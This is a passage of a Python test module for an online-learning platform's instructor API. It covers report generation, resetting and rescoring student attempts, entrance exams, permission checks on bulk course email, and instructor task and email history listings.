('mock_file_name_1', 'https://1.mock.url'),
('mock_file_name_2', 'https://2.mock.url'),
]
response = self.client.post(url, {})
expected_response = {
"downloads": [
{
"url": "https://1.mock.url",
"link": "<a href=\"https://1.mock.url\">mock_file_name_1</a>",
"name": "mock_file_name_1"
},
{
"url": "https://2.mock.url",
"link": "<a href=\"https://2.mock.url\">mock_file_name_2</a>",
"name": "mock_file_name_2"
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected_response
@ddt.data(*REPORTS_DATA)
@ddt.unpack
@valid_problem_location
def test_calculate_report_csv_success(
self, report_type, instructor_api_endpoint, task_api_endpoint, extra_instructor_api_kwargs
):
kwargs = {'course_id': str(self.course.id)}
kwargs.update(extra_instructor_api_kwargs)
url = reverse(instructor_api_endpoint, kwargs=kwargs)
success_status = f"The {report_type} report is being created."
with patch(task_api_endpoint) as mock_task_api_endpoint:
if report_type == 'problem responses':
mock_task_api_endpoint.return_value = Mock(task_id='task-id-1138')
response = self.client.post(url, {'problem_location': ''})
self.assertContains(response, success_status)
else:
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
response = self.client.post(url, {})
self.assertContains(response, success_status)
def test_get_ora2_responses_success(self):
url = reverse('export_ora2_data', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = "The ORA data report is being created."
self.assertContains(response, success_status)
def test_get_ora2_responses_already_running(self):
url = reverse('export_ora2_data', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_data'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_ora2_submission_files_success(self):
url = reverse('export_ora2_submission_files', kwargs={'course_id': str(self.course.id)})
with patch(
'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files'
) as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = 'Attachments archive is being created.'
self.assertContains(response, success_status)
def test_get_ora2_submission_files_already_running(self):
url = reverse('export_ora2_submission_files', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_submission_files'
already_running_status = generate_already_running_error_message(task_type)
with patch(
'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files'
) as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_ora2_summary_responses_success(self):
url = reverse('export_ora2_summary', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = "The ORA summary report is being created."
self.assertContains(response, success_status)
def test_get_ora2_summary_responses_already_running(self):
url = reverse('export_ora2_summary', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_summary'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_student_progress_url(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
data = {'unique_student_identifier': self.students[0].email}
response = self.client.post(url, data)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert 'progress_url' in res_json
def test_get_student_progress_url_from_uname(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
data = {'unique_student_identifier': self.students[0].username}
response = self.client.post(url, data)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert 'progress_url' in res_json
def test_get_student_progress_url_noparams(self):
""" Test that the endpoint 404's without the required query params. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_get_student_progress_url_nostudent(self):
""" Test that the endpoint 400's when requesting an unknown email. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
        response = self.client.post(url, {'unique_student_identifier': 'robot-not-a-user@example.com'})
assert response.status_code == 400
class TestInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change student grades.
This includes resetting attempts and starting rescore tasks.
This test does NOT test whether the actions had an effect on the
    database; that is the job of task tests and test_enrollment.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.problem_urlname = str(cls.problem_location)
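        # The problem never needs to exist in the modulestore here: reset acts on
        # the StudentModule row created in setUp, and rescore task submission is
        # mocked in the tests below.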
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 10}),
)
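        # 'state' is an opaque JSON blob; resetting attempts rewrites 'attempts'
        # to 0 in place, while delete_module removes the row entirely.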
    def test_reset_student_attempts_delete_all(self):
        """ Make sure no one can delete all students' state on a problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
'delete_module': True,
})
assert response.status_code == 400
def test_reset_student_attempts_single(self):
""" Test reset single student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# make sure problem attempts have been reset.
changed_module = StudentModule.objects.get(pk=self.module_to_reset.pk)
assert json.loads(changed_module.state)['attempts'] == 0
# mock out the function which should be called to execute the action.
@patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_for_all_students')
def test_reset_student_attempts_all(self, act):
""" Test reset all student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
assert response.status_code == 200
assert act.called
def test_reset_student_attempts_missingmodule(self):
""" Test reset for non-existant problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': 'robot-not-a-real-module',
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
@patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
""" Test delete single student state. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 200
# make sure the module has been deleted
assert StudentModule.objects\
.filter(student=self.module_to_reset.student, course_id=self.module_to_reset.course_id).count() == 0
def test_reset_student_attempts_nonsense(self):
""" Test failure with both unique_student_identifier and all_students. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student')
def test_rescore_problem_single(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
assert act.called
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student')
def test_rescore_problem_single_from_uname(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.username,
})
assert response.status_code == 200
assert act.called
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_all_students')
def test_rescore_problem_all(self, act):
""" Test rescoring for all students. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
assert response.status_code == 200
assert act.called
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
def test_course_has_entrance_exam_in_student_attempts_reset(self):
""" Test course has entrance exam id set while resetting attempts"""
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'delete_module': False,
})
assert response.status_code == 400
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
def test_rescore_entrance_exam_with_invalid_exam(self):
""" Test course has entrance exam id set while re-scoring. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
@ddt.ddt
class TestEntranceExamInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can rescore student grades,
reset student attempts and delete state for entrance exam.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create(
org='test_org',
course='test_course',
run='test_run',
entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course')
)
cls.course_with_invalid_ee = CourseFactory.create(entrance_exam_id='invalid_exam')
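        # 'invalid_exam' cannot be parsed as a usage key, so endpoints hit with
        # course_with_invalid_ee are expected to fail with a 400.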
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.entrance_exam = ItemFactory.create(
parent=cls.course,
category='chapter',
display_name='Entrance exam'
)
subsection = ItemFactory.create(
parent=cls.entrance_exam,
category='sequential',
display_name='Subsection 1'
)
vertical = ItemFactory.create(
parent=subsection,
category='vertical',
display_name='Vertical 1'
)
cls.ee_problem_1 = ItemFactory.create(
parent=vertical,
category="problem",
display_name="Exam Problem - Problem 1"
)
cls.ee_problem_2 = ItemFactory.create(
parent=vertical,
category="problem",
display_name="Exam Problem - Problem 2"
)
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
# Add instructor to invalid ee course
CourseInstructorRole(self.course_with_invalid_ee.id).add_users(self.instructor)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
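        # Seed state for both entrance-exam problems so the reset/delete
        # endpoints exercised below have attempts to act on.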
ee_module_to_reset1 = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.ee_problem_1.location,
state=json.dumps({'attempts': 10, 'done': True}),
)
ee_module_to_reset2 = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.ee_problem_2.location,
state=json.dumps({'attempts': 10, 'done': True}),
)
self.ee_modules = [ee_module_to_reset1.module_state_key, ee_module_to_reset2.module_state_key]
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_grade_histogram(self, store):
"""
Verify that a histogram has been created.
"""
course = CourseFactory.create(default_store=store)
usage_key = course.id.make_usage_key('problem', 'first_problem')
StudentModule.objects.create(
student_id=1,
grade=100,
module_state_key=usage_key
)
StudentModule.objects.create(
student_id=2,
grade=50,
module_state_key=usage_key
)
grades = grade_histogram(usage_key)
assert grades[0] == (50.0, 1)
assert grades[1] == (100.0, 1)
def test_reset_entrance_exam_student_attempts_delete_all(self):
""" Make sure no one can delete all students state on entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'delete_module': True,
})
assert response.status_code == 400
def test_reset_entrance_exam_student_attempts_single(self):
""" Test reset single student attempts for entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# make sure problem attempts have been reset.
changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules)
for changed_module in changed_modules:
assert json.loads(changed_module.state)['attempts'] == 0
# mock out the function which should be called to execute the action.
@patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_in_entrance_exam')
def test_reset_entrance_exam_all_student_attempts(self, act):
""" Test reset all student attempts for entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
})
assert response.status_code == 200
assert act.called
def test_reset_student_attempts_invalid_entrance_exam(self):
""" Test reset for invalid entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_entrance_exam_student_delete_state(self):
""" Test delete single student entrance exam state. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 200
# make sure the module has been deleted
changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules)
assert changed_modules.count() == 0
def test_entrance_exam_delete_state_with_staff(self):
""" Test entrance exam delete state failure with staff access. """
self.client.logout()
staff_user = StaffFactory(course_key=self.course.id)
self.client.login(username=staff_user.username, password='test')
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 403
def test_entrance_exam_reset_student_attempts_nonsense(self):
""" Test failure with both unique_student_identifier and all_students. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
@patch('lms.djangoapps.instructor_task.api.submit_rescore_entrance_exam_for_student')
def test_rescore_entrance_exam_single_student(self, act):
""" Test re-scoring of entrance exam for single student. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
assert act.called
def test_rescore_entrance_exam_all_student(self):
""" Test rescoring for all students. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
})
assert response.status_code == 200
def test_rescore_entrance_exam_if_higher_all_student(self):
""" Test rescoring for all students only if higher. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'only_if_higher': True,
})
assert response.status_code == 200
def test_rescore_entrance_exam_all_student_and_single(self):
""" Test re-scoring with both all students and single student parameters. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
def test_rescore_entrance_exam_with_invalid_exam(self):
""" Test re-scoring of entrance exam with invalid exam. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_list_entrance_exam_instructor_tasks_student(self):
""" Test list task history for entrance exam AND student. """
# create a re-score entrance exam task
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
tasks = json.loads(response.content.decode('utf-8'))['tasks']
assert len(tasks) == 1
assert tasks[0]['status'] == _('Complete')
def test_list_entrance_exam_instructor_tasks_all_student(self):
""" Test list task history for entrance exam AND all student. """
url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
assert response.status_code == 200
# check response
tasks = json.loads(response.content.decode('utf-8'))['tasks']
assert len(tasks) == 0
def test_list_entrance_exam_instructor_with_invalid_exam_key(self):
""" Test list task history for entrance exam failure if course has invalid exam. """
url = reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_skip_entrance_exam_student(self):
""" Test skip entrance exam api for student. """
# create a re-score entrance exam task
url = reverse('mark_student_can_skip_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
message = _('This student (%s) will skip the entrance exam.') % self.student.email
self.assertContains(response, message)
# post again with same student
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
# This time response message should be different
message = _('This student (%s) is already allowed to skip the entrance exam.') % self.student.email
self.assertContains(response, message)
@patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long
class TestInstructorSendEmail(SiteMixin, SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Checks that only instructors have access to email endpoints, and that
these endpoints are only accessible with courses that actually exist,
only with valid email messages.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
test_subject = '\u1234 test subject'
test_message = '\u6824 test message'
cls.full_test_message = {
'send_to': '["myself", "staff"]',
'subject': test_subject,
'message': test_message,
}
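        # Enable the bulk email feature without requiring per-course email
        # authorization.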
BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
BulkEmailFlag.objects.all().delete()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
def test_send_email_as_logged_in_instructor(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
def test_send_email_but_not_logged_in(self):
self.client.logout()
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 403
def test_send_email_but_not_staff(self):
self.client.logout()
student = UserFactory()
self.client.login(username=student.username, password='test')
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 403
def test_send_email_but_course_not_exist(self):
url = reverse('send_email', kwargs={'course_id': 'GarbageCourse/DNE/NoTerm'})
response = self.client.post(url, self.full_test_message)
assert response.status_code != 200
def test_send_email_no_sendto(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'subject': 'test subject',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_invalid_sendto(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["invalid_target", "staff"]',
'subject': 'test subject',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_no_subject(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["staff"]',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_no_message(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["staff"]',
'subject': 'test subject',
})
assert response.status_code == 400
def test_send_email_with_site_template_and_from_addr(self):
site_email = self.site_configuration.site_values.get('course_email_from_addr')
site_template = self.site_configuration.site_values.get('course_email_template_name')
CourseEmailTemplate.objects.create(name=site_template)
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
assert 1 == CourseEmail.objects.filter(course_id=self.course.id, sender=self.instructor,
subject=self.full_test_message['subject'],
html_message=self.full_test_message['message'],
template_name=site_template, from_addr=site_email).count()
def test_send_email_with_org_template_and_from_addr(self):
org_email = 'fake_org@example.com'
org_template = 'fake_org_email_template'
CourseEmailTemplate.objects.create(name=org_template)
self.site_configuration.site_values.update({
'course_email_from_addr': {self.course.id.org: org_email},
'course_email_template_name': {self.course.id.org: org_template}
})
self.site_configuration.save()
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
assert 1 == CourseEmail.objects.filter(course_id=self.course.id, sender=self.instructor,
subject=self.full_test_message['subject'],
html_message=self.full_test_message['message'],
template_name=org_template, from_addr=org_email).count()
class MockCompletionInfo:
"""Mock for get_task_completion_info"""
times_called = 0
def mock_get_task_completion_info(self, *args): # pylint: disable=unused-argument
"""Mock for get_task_completion_info"""
self.times_called += 1
if self.times_called % 2 == 0:
return True, 'Task Completed'
return False, 'Task Errored In Some Way'
class TestInstructorAPITaskLists(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor task list endpoint.
"""
class FakeTask:
""" Fake task object """
FEATURES = [
'task_type',
'task_input',
'task_id',
'requester',
'task_state',
'created',
'status',
'task_message',
'duration_sec'
]
def __init__(self, completion):
for feature in self.FEATURES:
setattr(self, feature, 'expected')
# created needs to be a datetime
self.created = datetime.datetime(2013, 10, 25, 11, 42, 35)
# set 'status' and 'task_message' attrs
success, task_message = completion()
if success:
self.status = "Complete"
else:
self.status = "Incomplete"
self.task_message = task_message
# Set 'task_output' attr, which will be parsed to the 'duration_sec' attr.
self.task_output = '{"duration_ms": 1035000}'
self.duration_sec = 1035000 / 1000.0
def make_invalid_output(self):
"""Munge task_output to be invalid json"""
self.task_output = 'HI MY NAME IS INVALID JSON'
# This should be given the value of 'unknown' if the task output
# can't be properly parsed
self.duration_sec = 'unknown'
def to_dict(self):
""" Convert fake task to dictionary representation. """
attr_dict = {key: getattr(self, key) for key in self.FEATURES}
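            # serialize 'created' the same way the endpoint does (ISO 8601)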
attr_dict['created'] = attr_dict['created'].isoformat()
return attr_dict
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create(
entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course')
)
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.problem_urlname = str(cls.problem_location)
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.module = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 10}),
)
mock_factory = MockCompletionInfo()
self.tasks = [self.FakeTask(mock_factory.mock_get_task_completion_info) for _ in range(7)]
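        # Give the last fake task unparseable output so the list endpoints
        # exercise the 'unknown' duration fallback.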
self.tasks[-1].make_invalid_output()
@patch('lms.djangoapps.instructor_task.api.get_running_instructor_tasks')
def test_list_instructor_tasks_running(self, act):
""" Test list of all running tasks. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_background_email_tasks(self, act):
"""Test list of background email tasks."""
act.return_value = self.tasks
url = reverse('list_background_email_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_instructor_tasks_problem(self, act):
""" Test list task history for problem. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {
'problem_location_str': self.problem_urlname,
})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_instructor_tasks_problem_student(self, act):
""" Test list task history for problem AND student. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {
'problem_location_str': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history', autospec=True)
class TestInstructorEmailContentList(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test the instructor email content history endpoint.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.tasks = {}
self.emails = {}
self.emails_info = {}
def setup_fake_email_info(self, num_emails, with_failures=False):
""" Initialize the specified number of fake emails """
for email_id in range(num_emails):
num_sent = random.randint(1, 15401)
if with_failures:
failed = random.randint(1, 15401)
else:
failed = 0
self.tasks[email_id] = FakeContentTask(email_id, num_sent, failed, 'expected')
self.emails[email_id] = FakeEmail(email_id)
self.emails_info[email_id] = FakeEmailInfo(self.emails[email_id], num_sent, failed)
def get_matching_mock_email(self, **kwargs):
""" Returns the matching mock emails for the given id """
email_id = kwargs.get('id', 0)
return self.emails[email_id]
def get_email_content_response(self, num_emails, task_history_request, with_failures=False):
""" Calls the list_email_content endpoint and returns the repsonse """
self.setup_fake_email_info(num_emails, with_failures)
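        # The patched get_instructor_task_history will return our fake tasks.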
task_history_request.return_value = list(self.tasks.values())
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info:
mock_email_info.side_effect = self.get_matching_mock_email
response = self.client.post(url, {})
assert response.status_code == 200
return response
def check_emails_sent(self, num_emails, task_history_request, with_failures=False):
""" Tests sending emails with or without failures """
response = self.get_email_content_response(num_emails, task_history_request, with_failures)
assert task_history_request.called
expected_email_info = [email_info.to_dict() for email_info in self.emails_info.values()]
actual_email_info = json.loads(response.content.decode('utf-8'))['emails']
assert len(actual_email_info) == num_emails
for exp_email, act_email in zip(expected_email_info, actual_email_info):
self.assertDictEqual(exp_email, act_email)
assert expected_email_info == actual_email_info
def test_content_list_one_email(self, task_history_request):
""" Test listing of bulk emails when email list has one email """
response = self.get_email_content_response(1, task_history_request)
assert task_history_request.called
email_info = json.loads(response.content.decode('utf-8'))['emails']
# Emails list should have one email
assert len(email_info) == 1
# Email content should be what's expected
expected_message = self.emails[0].html_message
returned_email_info = email_info[0]
received_message = returned_email_info['email']['html_message']
assert expected_message == received_message
def test_content_list_no_emails(self, task_history_request):
""" Test listing of bulk emails when email list empty """
response = self.get_email_content_response(0, task_history_request)
assert task_history_request.called
email_info = json.loads(response.content.decode('utf-8'))['emails']
# Emails list should be empty
assert len(email_info) == 0
def test_content_list_email_content_many(self, task_history_request):
""" Test listing of bulk emails sent large amount of emails """
self.check_emails_sent(50, task_history_request)
def test_list_email_content_error(self, task_history_request):
""" Test handling of error retrieving email """
invalid_task = FakeContentTask(0, 0, 0, 'test')
invalid_task.make_invalid_input()
task_history_request.return_value = [invalid_task]
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
assert response.status_code == 200
assert task_history_request.called
returned_email_info = json.loads(response.content.decode('utf-8'))['emails']
assert len(returned_email_info) == 1
returned_info = returned_email_info[0]
for info in ['created', 'sent_to', 'email', 'number_sent', 'requester']:
assert returned_info[info] is None
def test_list_email_with_failure(self, task_history_request):
""" Test the handling of email task that had failures """
self.check_emails_sent(1, task_history_request, True)
def test_list_many_emails_with_failures(self, task_history_request):
""" Test the handling of many emails with failures """
self.check_emails_sent(50, task_history_request, True)
def test_list_email_with_no_successes(self, task_history_request):
task_info = FakeContentTask(0, 0, 10, 'expected')
email = FakeEmail(0)
